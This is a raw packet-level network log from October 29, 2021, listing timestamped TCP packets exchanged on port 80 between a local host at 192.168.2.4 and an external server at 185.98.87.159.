Oct 29, 2021 20:50:19.591434956 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591459036 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591460943 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591480017 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591501951 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591526031 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591547012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591561079 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591567039 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591576099 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591593981 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591595888 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591619015 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591639996 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591660023 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591674089 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591686010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591697931 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591707945 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591727018 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591741085 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591747999 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591768980 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591777086 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591793060 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591814041 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591824055 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591834068 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591854095 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591873884 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591886997 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591893911 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591907024 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591913939 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591931105 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591947079 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591969013 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.591983080 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.591989994 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592010975 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592031956 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592034101 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.592055082 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592065096 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.592076063 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592108965 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.592127085 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592148066 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592171907 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592171907 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.592195034 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592214108 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.592216969 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592240095 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592257977 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.592259884 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592283010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592297077 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.592303991 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592327118 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592348099 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.592348099 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592371941 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592386961 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.592392921 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592415094 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592431068 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.592436075 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592457056 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.592472076 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.593643904 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.639862061 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.639889956 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.639910936 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.639933109 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.639949083 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.639954090 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.639976025 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.639976978 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.639997005 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640021086 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640032053 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640044928 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640054941 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640067101 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640089035 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640105963 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640108109 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640125036 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640146017 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640155077 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640167952 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640177965 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640192032 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640212059 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640214920 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640234947 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640255928 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640255928 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640276909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640299082 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640305042 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640343904 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640464067 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640486956 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640508890 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640548944 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640585899 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640609026 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640630007 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640652895 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640676975 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640677929 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640685081 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640705109 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640727997 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640738964 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640750885 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640772104 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.640773058 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.640814066 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641393900 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641423941 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641449928 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641475916 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641475916 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641504049 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641525984 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641531944 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641567945 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641580105 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641598940 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641625881 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641645908 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641654015 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641683102 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641709089 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641720057 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641736984 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641765118 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641774893 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641792059 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641819000 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641824007 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641845942 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641872883 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641895056 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641902924 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641915083 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641930103 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641957998 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.641972065 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.641984940 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642013073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642035961 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642040014 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642066956 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642085075 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642095089 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642122984 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642148018 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642149925 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642178059 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642201900 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642205954 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642232895 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642250061 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642260075 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642286062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642302990 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642313957 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642342091 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642365932 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642366886 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642395973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642410994 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642422915 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642448902 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642465115 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642477036 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642503023 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642518044 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642529964 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642556906 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642574072 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642582893 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642610073 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642621994 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642637968 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642673016 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642693043 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642704010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642731905 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642756939 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642759085 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.642785072 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.642887115 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.644731045 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.644759893 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.644785881 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.644785881 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.644814968 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.644829035 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.644870043 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.644898891 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.644915104 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.645464897 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645493984 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645519018 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.645522118 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645548105 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645566940 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.645576000 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645602942 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645616055 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.645629883 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645658016 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645672083 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.645685911 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645713091 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645734072 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.645740986 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645766973 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645782948 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.645793915 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645821095 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645842075 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.645848036 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645875931 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645903111 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645910978 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.645931959 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645953894 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.645957947 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.645986080 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646006107 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646013975 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646042109 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646061897 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646070004 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646097898 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646114111 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646125078 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646153927 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646174908 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646181107 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646208048 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646226883 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646234989 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646262884 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646276951 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646291971 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646320105 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646332026 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646347046 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646373987 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646395922 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646401882 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646429062 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646444082 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646456957 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646483898 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646497011 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646509886 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646538019 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646549940 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646563053 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646590948 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646601915 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646616936 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646642923 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646656036 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646670103 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646698952 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646711111 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646727085 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646754026 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646768093 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646780014 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646807909 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646820068 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646833897 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646859884 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646872044 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646888018 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646914005 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646928072 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.646939993 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646967888 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.646980047 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.692934990 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693013906 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693048954 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.693073988 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693125010 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693139076 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.693176985 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693228960 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693245888 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.693285942 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693346024 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693351984 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.693399906 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693450928 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693456888 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.693502903 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693552017 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693559885 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.693608046 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693667889 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.693670988 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693732977 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693795919 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693809986 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.693859100 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693916082 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.693942070 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.693973064 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694029093 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694044113 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.694092035 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694143057 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694194078 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694240093 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694271088 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.694293022 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694341898 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694344044 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.694391012 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694441080 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694478035 CEST	49855	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:19.694489956 CEST	80	49855	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:19.694540977 CEST	80	49855	185.98.87.159	192.168.2.4
